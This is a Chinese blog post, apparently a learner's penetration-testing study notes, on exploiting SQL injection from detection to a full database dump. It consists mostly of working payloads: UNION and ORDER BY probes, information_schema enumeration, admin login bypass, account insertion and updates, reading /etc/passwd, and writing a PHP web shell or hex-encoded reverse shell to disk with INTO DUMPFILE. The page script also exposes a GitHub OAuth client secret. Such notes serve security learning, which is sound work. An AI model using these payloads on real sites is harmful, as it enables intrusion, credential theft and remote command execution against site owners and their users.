<!DOCTYPE html>
<html>
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    <meta name="theme-color" content="#33363b">
    <meta name="msapplication-TileColor" content="#33363b">
    
    
    
    
    <meta name="keywords" content="Life, ARIA, Hexo">
    
    
    <link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon.png">
    
    
    <link rel="icon" type="image/png" sizes="192x192" href="/favicons/android-chrome-192x192.png">
    
    
    <link rel="icon" type="image/png" sizes="32x32" href="/favicons/favicon-32x32.png">
    
    
    <link rel="icon" type="image/png" sizes="16x16" href="/favicons/favicon-16x16.png">
    
    
    <link rel="mask-icon" href="/favicons/safari-pinned-tab.svg" color="#33363b">
    
    
    <link rel="manifest" href="/favicons/site.webmanifest">
    
    
    <meta name="msapplication-config" content="/favicons/browserconfig.xml">
    
    
    <link rel="alternate" href="/atom.xml" title="Pyrrhax" type="application/atom+xml" />
    
    
    <link rel="shortcut icon" type="image/x-icon" href="/favicons/favicon.ico">
    
    
    <link rel="stylesheet" type="text/css" href="/css/normalize.css">
    <link rel="stylesheet" type="text/css" href="/css/index.css">
    
    <link rel="stylesheet" type="text/css" href="/css/sidebar.css">
    
    
<link rel="stylesheet" type="text/css" href="/css/page.css">
<link rel="stylesheet" type="text/css" href="/css/post.css">

    <link rel="stylesheet" type="text/css" href="/css/custom.css">
    <link rel="stylesheet" type="text/css" href="/css/atom-one-dark.css">
    <link rel="stylesheet" type="text/css" href="/css/lightgallery.min.css">
    <script type="text/javascript" src="/js/jquery.min.js"></script>
    <script defer type="text/javascript" src="/js/util.js"></script>
    <script defer type="text/javascript" src="/js/clipboard.min.js"></script>
    <script defer type="text/javascript" src="/js/scrollspy.js"></script>
    <script defer type="text/javascript" src="/js/fontawesome-all.min.js"></script>
    <script defer type="text/javascript" src="/js/lightgallery.min.js"></script>
    <script defer type="text/javascript" src="/js/lg-fullscreen.min.js"></script>
    <script defer type="text/javascript" src="/js/lg-hash.min.js"></script>
    <script defer type="text/javascript" src="/js/lg-pager.min.js"></script>
    <script defer type="text/javascript" src="/js/lg-thumbnail.min.js"></script>
    <script defer type="text/javascript" src="/js/lg-zoom.min.js"></script>
    
    <script defer src="/js/busuanzi.pure.mini.js"></script>
    
    
    <script defer type="text/javascript" src="/js/search.js"></script>
    <script type="text/javascript">
    $(document).ready(function () {
      var searchPath = "search.xml";
      if (searchPath.length === 0) {
        searchPath = "search.xml";
      }
      var path = "/" + searchPath;
      searchFunc(path, "search-input", "search-result");
    });
    </script>
    
    
    <script defer type="text/javascript" src="/js/index.js"></script>
    <script type="text/javascript">
    $(document).ready(function () {
      var cb = null;
      var els = $(".post figure.highlight");
      if (els.length) {
        // Enabled Hexo highlight line number.
        $(els).each(function (i, e) {
          // $(e).before("<button class=\"copy button\">复制</button>");
          $(e).before([
            "<div class=\"code-titlebar\">",
              "<div class=\"titlebar-left\">",
                "<button class=\"copy\" aria-label=\"复制\"><i class=\"far fa-copy\"></i></button>",
              "</div>",
              "<div class=\"titlebar-center\">",
                "code",
              "</div>",
              "<div class=\"titlebar-right\">",
                "<button class=\"button-dot dot-minimize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-maximize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-close\" aria-label=\"Decoration\"></button>",
              "</div>",
            "</div>"
          ].join(""));
        });
        cb = new ClipboardJS("button.copy", {
          "target": function (trigger) {
              // Get target element by DOM API.
              return trigger.parentNode.parentNode.nextElementSibling.firstChild.firstChild.firstChild.lastChild.firstChild.firstChild;
          }
        });
      } else {
        // Disabled Hexo highlight line number.
        els = $(".post pre code");
        $(els).each(function (i, e) {
          // Add button before pre, not code.
          // $(e).parent().before("<button class=\"copy button\">复制</button>");
          $(e).before([
            "<div class=\"code-titlebar\">",
              "<div class=\"titlebar-left\">",
                "<button class=\"copy\" aria-label=\"复制\"><i class=\"far fa-copy\"></i></button>",
              "</div>",
              "<div class=\"titlebar-center\">",
                "code",
              "</div>",
              "<div class=\"titlebar-right\">",
                "<button class=\"button-dot dot-minimize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-maximize\" aria-label=\"Decoration\"></button>",
                "<button class=\"button-dot dot-close\" aria-label=\"Decoration\"></button>",
              "</div>",
            "</div>"
          ].join(""));
        });
        cb = new ClipboardJS("button.copy", {
          "target": function (trigger) {
              // Get target element by DOM API.
              return trigger.parentNode.parentNode.nextElementSibling;
          }
        });
      }
      cb.on("success", function (e) {
        e.clearSelection();
        var trigger = e.trigger;
        // Change button text as a user tip.
        trigger.innerHTML = "<i class=\"far fa-check-square\"></i>";
        $(trigger).addClass("copied");
        // Change button text back;
        setTimeout(function () {
          trigger.innerHTML = "<i class=\"far fa-copy\"></i>";
          $(trigger).removeClass("copied");
        }, 1500);
      });
    });
    </script>
    
    <script defer type="text/javascript" src="/js/custom.js"></script>
    <title>SQL注入（一）SQL注入的利用思路 | Pyrrhax</title>
  <meta name="generator" content="Hexo 4.2.1"></head>
  <body itemscope itemtype="http://schema.org/WebPage" lang="zh_CN"  data-spy="scroll" data-target=".list-group">
    
<header id="header" class="header" style="background: #33363b;">
  <div class="container">
    <div class="header-container">
      <div class="header-title">
        <h1 class="title"><a href="/">Pyrrhax</a></h1>
        <h2 class="subtitle"></h2>
      </div>
      
      <div class="logo">
        <img src="/images/logo.png" alt="logo">
      </div>
      
    </div>
    <nav id="nav" class="nav">
      <a id="nav-toggle" class="nav-toggle" aria-hidden="true"><i class="fas fa-bars" aria-label="切换导航栏"></i></a>
      <ul id="menu" role="menubar" aria-hidden="false">
        
        <li role="menuitem"><a href="/"><i class="fas fa-home"></i><span class="menu-text">首页</span></a></li>
        
        <li role="menuitem"><a href="/archives/"><i class="fas fa-archive"></i><span class="menu-text">归档</span></a></li>
        
        <li role="menuitem"><a href="/categories/"><i class="fas fa-th-list"></i><span class="menu-text">分类</span></a></li>
        
        <li role="menuitem"><a href="/tags/"><i class="fas fa-tags"></i><span class="menu-text">标签</span></a></li>
        
        <li role="menuitem"><a href="/about/"><i class="fas fa-user-edit"></i><span class="menu-text">关于</span></a></li>
        
      </ul>
    </nav>
  </div>
</header>


    <main id="main" class="main">
      <div class="container">
        <div class="main-container">
          <div class="content">
            
<div id="post" class="page">
  
  <article class="article post card" itemscope itemtype="http://schema.org/Article">
    <div class="post-block">
      <link itemprop="mainEntityOfPage" href="http://yoursite.com/posts/5cd68c09.html">
      <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
       <meta itemprop="name" content="Pyrrhax">
       <meta itemprop="description" content="">
       <meta itemprop="image" content="/images/avatar.png">
      </span>
      <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
       <meta itemprop="name" content="Pyrrhax">
      </span>
    </div>
    <header class="post-header">
      <h1 class="post-title" itemprop="name headline">SQL注入（一）SQL注入的利用思路</h1>
      <div class="post-meta">
        
        <span class="post-date">
          <i class="far fa-calendar-plus"></i><span><time title="post-date" itemprop="dateCreated datePublished" datetime="2021-02-04T16:54:31+08:00">2021-02-04 16:54:31</time></span>
        </span>
        
        
        
        <span class="post-meta-divider divider">|</span>
        
        <span class="post-categories">
          
          <i class="far fa-folder-open"></i><span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">信息安全</span></a></span><i class="fas fa-angle-right"></i><span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a></span>
        </span>
        
        
        
        
      </div>
    </header>
    <main class="post-main" itemprop="articleBody">
      <p>从检测到拖库的基本流程</p>
<a id="more"></a>

<h4 id="一、检测是否存在注入"><a href="#一、检测是否存在注入" class="headerlink" title="一、检测是否存在注入"></a>一、检测是否存在注入</h4><ul>
<li>基于报错的检测方法<ul>
<li>’    ”    %    （）</li>
</ul>
</li>
<li>基于布尔的检测<ul>
<li>1‘ and ‘1’=’1    /    1’ and ‘1</li>
<li>1’ and ‘1’=2    /    1’ and ‘0</li>
</ul>
</li>
</ul>
<h4 id="二、查明查询返回的列数"><a href="#二、查明查询返回的列数" class="headerlink" title="二、查明查询返回的列数"></a>二、查明查询返回的列数</h4><p><em>注意：–后必须加一个空格，否则注释不生效</em></p>
<ul>
<li>方法1，查询得到执行，说明该列存在，试出最大列数：<ul>
<li>‘ order by 20 – </li>
<li>‘ order by 10 – </li>
<li>‘ order by 5 – </li>
</ul>
</li>
<li>方法2，查询得到执行，说明使用了正确的列数：<ul>
<li>‘ union select null – </li>
<li>‘ union select null, null – </li>
<li>‘ union select null, null, null – </li>
</ul>
</li>
<li>方法3<ul>
<li>‘ union select 1,2,3,4 – 观察前端返回的是查询到的第几个字段</li>
</ul>
</li>
</ul>
<h4 id="三、找到一个使用字符串数据类型的列"><a href="#三、找到一个使用字符串数据类型的列" class="headerlink" title="三、找到一个使用字符串数据类型的列"></a>三、找到一个使用字符串数据类型的列</h4><ul>
<li>注入以下语句，如果查询得到执行，将看到另一行包含a的数据<ul>
<li>‘ union select ‘a’, null, null –</li>
<li>‘ union select null, ‘a’, null –</li>
<li>‘ union select null, null, ‘a’ –</li>
</ul>
</li>
<li>此时可以，把字符串的字段改为数据库的函数<ul>
<li>‘ union all select database()，null,null –</li>
<li>‘ union select @@version,null,null –    (Mysql)    </li>
<li>‘ union select banner,null,null from v$version–    (Oracle)</li>
</ul>
</li>
</ul>
<!--more-->

<h4 id="四、获取有用的数据"><a href="#四、获取有用的数据" class="headerlink" title="四、获取有用的数据"></a>四、获取有用的数据</h4><ul>
<li>一些常用的函数：<ul>
<li>’ union select database() ,substring_index(USER(),”@”,1)– <ul>
<li>把USER()执行的结果用@切分，显示第一段</li>
</ul>
</li>
<li>DB用户：user()</li>
<li>DB版本：version()</li>
<li>全局函数：@@datadir、@@hostname、@@VERSION、@@version_compile_os</li>
<li>当前库：database()</li>
<li>ASCII转字符：char()</li>
<li>CONCAT_WS(CHAR(32,58,32),user(),database(),version())</li>
<li>MD5(‘b’)</li>
</ul>
</li>
</ul>
<h4 id="五、拖库"><a href="#五、拖库" class="headerlink" title="五、拖库"></a>五、拖库</h4><h5 id="有权限读取information-schema库"><a href="#有权限读取information-schema库" class="headerlink" title="有权限读取information_schema库"></a>有权限读取information_schema库</h5><ul>
<li>MySQL数据查询（元数据的表 information_schema）<ul>
<li>查询有那些库<ul>
<li>select schema_name from information_schema.schemata;</li>
<li>select distinct table_schema from information_schema.tables;</li>
</ul>
</li>
<li>查询有哪些表<ul>
<li>select table_name from information_schema.tables;</li>
<li>select count(*),table_schema from information_schema.tables group by table_schema //看看每个库各有几张表<ul>
<li>其中information_schema很有价值，必须要学。</li>
</ul>
</li>
</ul>
</li>
<li>查询库中的表名<ul>
<li>select  table_schema from information_schema.tables where table_schema= ‘dvwa’</li>
</ul>
</li>
<li>查询表中的列名<ul>
<li>select table_name,column_name from information_schema.columns where table_schema = ‘dvwa’ and table_name=’users’</li>
</ul>
</li>
<li>查询表中数据</li>
</ul>
</li>
</ul>
<h5 id="无权读取information-schema库-拒绝union、order-by语句"><a href="#无权读取information-schema库-拒绝union、order-by语句" class="headerlink" title="无权读取information_schema库 / 拒绝union、order by语句"></a>无权读取information_schema库 / 拒绝union、order by语句</h5><ul>
<li><p>第一步、猜列名：<code>&#39; and asd is null --</code></p>
<ul>
<li>可以通过返回信息得到 asd这个列是否存在，提前准备好字典。用burp Intruder</li>
<li><code>find / -name *.column*.txt</code><ul>
<li>去除以#开头的行<code>cat xxx.txt | grep -v ^# &gt; column.txt</code></li>
</ul>
</li>
</ul>
</li>
<li><p>通过列名猜当前表名：<code>&#39; and table.user is null --</code></p>
<ul>
<li><code>find / -name *.table.txt</code><ul>
<li>同样需要去除#开头的行</li>
</ul>
</li>
</ul>
</li>
<li><p>猜库名：<code>&#39; and db.table.user is null --</code></p>
</li>
<li><p>猜库中的其他表：<code>&#39; and (select count(*) from table)&gt;0 --</code></p>
</li>
<li><p>猜表对应关系：<code>&#39; and user.user is null --</code></p>
</li>
<li><p>猜字段内容：<code>or user=&#39;admin</code>,<code>or user like &#39;%a%&#39;</code></p>
</li>
<li><p>账号对应密码：<code>&#39; or user = &#39;admin&#39; and password = &#39;md5hash&#39;</code></p>
<ul>
<li>用md5sum命令把密码字典生成MD5字典，然后intruder</li>
</ul>
</li>
<li><p>可以插入账号密码数据条目<code>&#39;; insert xxxxxx</code>,<code>&#39;;update users set user=&#39;aaa&#39; where user=&#39;bbb&#39;</code></p>
</li>
</ul>
<h4 id="六、其它利用场景"><a href="#六、其它利用场景" class="headerlink" title="六、其它利用场景"></a>六、其它利用场景</h4><ul>
<li>读取文件<ul>
<li>select load_file(‘/etc/passwd’)</li>
</ul>
</li>
<li>写入文件<ul>
<li>select “&lt;?php passthru($_GET[‘cmd’]); ?&gt;” INTO DUMPFILE “/var/www/a.php”<ul>
<li>DUMPFILE后不加路径的话，默认位置在/var/lib/mysql/dvwa/a.php</li>
<li>语句中的符号可能会被过滤，可以尝试使用编码绕过，url编码，16进制编码。INTO DUMPFILE 函数会解码。<ul>
<li><code>cat reverse-shell.php|xxd -ps|tr -d &#39;\n&#39;</code><ul>
<li>xxd -ps 生成的二进制文件中会有换行符，需要用tr来去掉</li>
</ul>
</li>
<li>select (0x1111111111111) into dumpfile “/tmp/c.php”</li>
</ul>
</li>
</ul>
</li>
<li>写入到/tmp文件夹（777权限），然后include到页面中，include成为当前页面的一部分，而当前页面是有执行权限的</li>
</ul>
</li>
<li>保存下载数据库<ul>
<li>select select (0x1111111111111) into outfile “/tmp/a.db”</li>
</ul>
</li>
</ul>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><ol>
<li>判断是否存在</li>
<li>查明列数</li>
<li>找到string类型位置</li>
<li>查询，利用</li>
</ol>
<p>权限最小化，权限分离</p>

    </main>
    <footer class="post-footer">
      
      <div class="post-tags">
        
        <a class="post-tag button" href="/tags/KaliLinux%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" rel="tag"><i class="fas fa-tags"></i>KaliLinux渗透测试学习笔记</a>
        
      </div>
      
    </footer>
  </article>
  
  
  <nav class="page-nav">
    <div class="page-nav-next page-nav-item">
      
      <a href="/posts/af5f2fef.html" rel="next" title="计算机取证"><i class="fas fa-angle-left"></i><span class="nav-title">计算机取证</span></a>
      
    </div>
    <div class="page-nav-prev page-nav-item">
      
      <a href="/posts/d35cebb1.html" rel="prev" title="SQL注入（二）SQL注入进阶-报错注入、盲注"><span class="nav-title">SQL注入（二）SQL注入进阶-报错注入、盲注</span><i class="fas fa-angle-right"></i></a>
      
    </div>
  </nav>
  
  
  

<div class="comments" id="comments">
  
  
  <div class="commentjs" id="comment-thread"></div>
  <link rel="stylesheet" href="/css/commentjs.css">
  <script defer type="text/javascript" src="/js/marked.min.js"></script>
  <script defer type="text/javascript" src="/js/timeago.min.js"></script>
  <script defer type="text/javascript" src="/js/highlight.min.js"></script>
  <script defer type="text/javascript" src="/js/commentjs.js"></script>
  <script type="text/javascript">
  $(document).ready(function () {
    getComments({
      "type": "github",
      "user": "Pyrrhax",
      "repo": "Pyrrhax.github.io",
      "client_id": "ab41dde59a0f57819b1e",
      "client_secret": "71b8ae2203a2a15d590a6866959b732267194412",
      "no_comment": "这个页面还没有评论，现在就去评论吧！",
      "go_to_comment": "去评论",
      "issue_title": "SQL注入（一）SQL注入的利用思路",
      "btn_class": "button",
      "comments_target": "#comment-thread"
    });
    marked.setOptions({
      "highlight": function (code, lang) {
        return hljs.highlightAuto(code).value;
      }
    });
    function mark() {
      var markdowns = document.getElementsByClassName("markdown");
      for (var i = 0; i < markdowns.length; ++i){
        if (markdowns[i].innerHTML) {
          markdowns[i].innerHTML = marked(markdowns[i].innerHTML);
        }
      }
    }
    window.addEventListener("DOMContentLoaded", mark, false);
    window.addEventListener("load", mark, false);
  });
  </script>
  
  
</div>



  
</div>

          </div>
          
          
          
<aside class="sidebar" id="sidebar" style="background: url(/images/background.png);">
  
  <div class="search">
    <div class="form-group">
      <i class="fas fa-search"></i><input type="search" id="search-input" name="q" results="0" placeholder="搜索" class="form-control"/>
    </div>
  </div>
  <div class="search-result-box" id="search-result"></div>
  
  
<div class="info sidebar-item" id="info">
  
  <img class="author-avatar" src="/images/avatar.png" alt="Pyrrhax">
  
  <h1 class="author-name">Pyrrhax</h1>
  <h2 class="author-description"></h2>
  <div class="site-count">
    
    
    
    
    <div class="archives-count count-block">
      <div class="site-count-title">归档</div>
      <div><a href="/archives/">93</a></div>
    </div>
    
    
    
    <div class="categories-count count-block">
      <div class="site-count-title">分类</div>
      <div><a href="/categories/">14</a></div>
    </div>
    
    
    
    <div class="tags-count count-block">
      <div class="site-count-title">标签</div>
      <div><a href="/tags/">16</a></div>
    </div>
    
    
    
    
  </div>
  
  <div class="rss">
    <a class="rss-link button sidebar-item" href="/atom.xml"><i class="fas fa-rss"></i>RSS</a>
  </div>
  
</div>


  <div class="sidebar-sticky">
    
    
    
    
    
    <hr>
    <div class="post-toc sidebar-item" id="toc-div">
      <div><i class="fas fa-list-ol"></i>文章目录</div>
      <div class="post-toc-content"><ol class="list-group toc"><li class="toc-item toc-level-4"><a class="list-group-item toc-link" href="#一、检测是否存在注入"><span class="toc-text">一、检测是否存在注入</span></a></li><li class="toc-item toc-level-4"><a class="list-group-item toc-link" href="#二、查明查询返回的列数"><span class="toc-text">二、查明查询返回的列数</span></a></li><li class="toc-item toc-level-4"><a class="list-group-item toc-link" href="#三、找到一个使用字符串数据类型的列"><span class="toc-text">三、找到一个使用字符串数据类型的列</span></a></li><li class="toc-item toc-level-4"><a class="list-group-item toc-link" href="#四、获取有用的数据"><span class="toc-text">四、获取有用的数据</span></a></li><li class="toc-item toc-level-4"><a class="list-group-item toc-link" href="#五、拖库"><span class="toc-text">五、拖库</span></a><ol class="list-group toc-child"><li class="toc-item toc-level-5"><a class="list-group-item toc-link" href="#有权限读取information-schema库"><span class="toc-text">有权限读取information_schema库</span></a></li><li class="toc-item toc-level-5"><a class="list-group-item toc-link" href="#无权读取information-schema库-拒绝union、order-by语句"><span class="toc-text">无权读取information_schema库 &#x2F; 拒绝union、order by语句</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="list-group-item toc-link" href="#六、其它利用场景"><span class="toc-text">六、其它利用场景</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="list-group-item toc-link" href="#总结"><span class="toc-text">总结</span></a></div>
    </div>
    
    
    
    <hr>
    <div class="social-link sidebar-item">
      <div><i class="far fa-address-card"></i>社交链接</p></div>
      <ul>
        
        <li><i class="fas fa-envelope"></i><a href="mailto:Pyrrhax.hf@gmail.com" target="_blank">E-Mail</a></li>
        
        <li><i class="fab fa-github"></i><a href="https://github.com/Pyrrhax" target="_blank">GitHub</a></li>
        
      </ul>
    </div>
    
    
    <hr>
    <div class="blogroll sidebar-item">
      <div><i class="fas fa-link"></i>友情链接</div>
      <ul>
        
        <li><i class="fas fa-link"></i><a href="https://github.com/" target="_blank">GitHub</a></li>
        
        <li><i class="fas fa-link"></i><a href="https://developer.mozilla.org/" target="_blank">MDN</a></li>
        
        <li><i class="fas fa-link"></i><a href="https://mozilla.github.io/nunjucks/" target="_blank">Nunjucks</a></li>
        
      </ul>
    </div>
    
  </div>
</aside>


          
        </div>
      </div>
    </main>
    
<footer id="footer" class="footer" style="background: #33363b;">
  <div class="container">
    <div class="back-to-top">
      <button id="back-to-top"><i class="fas fa-angle-double-up" aria-label="回到顶部"></i></button>
    </div>
    <div class="footer-container">
      <div class="footer-left">
        <div class="copyright">
          <span class="author">Pyrrhax</span><span class="year"><i class="far fa-copyright"></i>2023</span>
        </div>
        
        <div class="busuanzi">
          <span id="busuanzi_container_site_pv"><i class="fas fa-eye" aria-label="站点点击量" aria-hidden="false"></i><span id="busuanzi_value_site_pv"></span></span><span id="busuanzi_container_site_uv"><i class="fas fa-user" aria-label="站点用户数" aria-hidden="false"></i><span id="busuanzi_value_site_uv"></span></span><span id="busuanzi_container_page_pv"><i class="far fa-file-alt"></i><span id="busuanzi_value_page_pv" aria-label="页面点击量" aria-hidden="false"></span></span>
        </div>
        
      </div>
      <div class="footer-right">
        <div class="custom-info">
          
          托管于<i class="fab fa-github-alt"></i><a href="https://pages.github.com/" target="_blank">GitHub Pages</a>
          
        </div>
        <div class="powered-by">
          由 <a href="https://hexo.io/" target="_blank">Hexo</a> 强力驱动 | 主题 <a href="https://github.com/AlynxZhou/hexo-theme-aria/" target="_blank">ARIA</a>
        </div>
      </div>
    </div>
  </div>
</footer>


  </body>
</html>
